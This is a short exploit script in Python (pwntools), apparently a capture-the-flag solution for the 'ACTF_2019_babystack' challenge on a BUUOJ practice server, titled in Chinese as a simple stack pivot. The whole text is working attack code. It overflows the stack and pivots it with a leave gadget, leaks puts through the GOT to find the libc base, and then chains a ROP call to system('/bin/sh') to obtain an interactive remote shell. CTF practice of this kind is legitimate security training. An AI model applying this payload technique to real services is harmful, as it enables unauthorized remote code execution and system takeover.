exp
简单栈迁移
from pwn import *
#context.log_level = 'debug'
io = remote('node3.buuoj.cn',27019)
#io = process('./ACTF_2019_babystack')
#io = process('./idaidg/linux_server64')
elf = ELF('./ACTF_2019_babystack')
libc = ELF('./libc/libc-2.27.so')
pop_rdi = 0x400ad3
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
start = 0x4008f6
leave = 0x400a18
ret = 0x400a4f
io.recvuntil("How many bytes of your message?")
io.sendline('224')
io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)
payload = 'a'* 8
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(start)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)
io.send(payload)
puts_addr = io.recvuntil('x7f')[-6:]
puts_addr = puts_addr.ljust(8,'x00')
print hex(u64(puts_addr))
libcbase = u64(puts_addr) - libc.symbols['puts']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()
io.recvuntil("How many bytes of your message?")
io.sendline('224')
io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)
payload = 'a'* 8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)
io.sendline(payload)
io.interactive()